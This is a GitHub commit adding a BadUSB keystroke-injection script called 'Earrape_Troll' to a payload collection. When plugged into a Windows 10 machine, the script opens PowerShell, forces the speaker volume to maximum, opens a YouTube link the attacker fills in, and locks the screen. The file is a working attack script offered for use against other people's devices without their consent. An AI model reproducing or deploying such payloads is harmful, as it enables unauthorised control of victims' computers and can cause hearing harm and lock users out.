Merge pull request #209 from Gr1mfl3sh/main

Create Earrape_Troll.txt
This commit is contained in:
UberGuidoZ 2022-11-08 21:33:15 -08:00 committed by GitHub
commit 2b4c26b3ba
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

19
BadUSB/Earrape_Troll.txt Normal file
View File

@ -0,0 +1,19 @@
REM Title: EARRAPE_TROLL + LOCKS DEVICE
REM Creator: Grim<3
REM What this script does is open powershell runs a command that makes the targets volume to max locks the targets device and plays song or sound from a youtube link
REM For: Win10 (will use default browser)
GUI R
DELAY 100
STRING Powershell.exe
ENTER
DELAY 500
STRING Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
ENTER
DELAY 100
STRING Set-Speaker -Volume 50
ENTER
DELAY 100
STRING start YOUR YOUTUBE LINK WITH THE HTTPS://
ENTER
DELAY 100
GUI L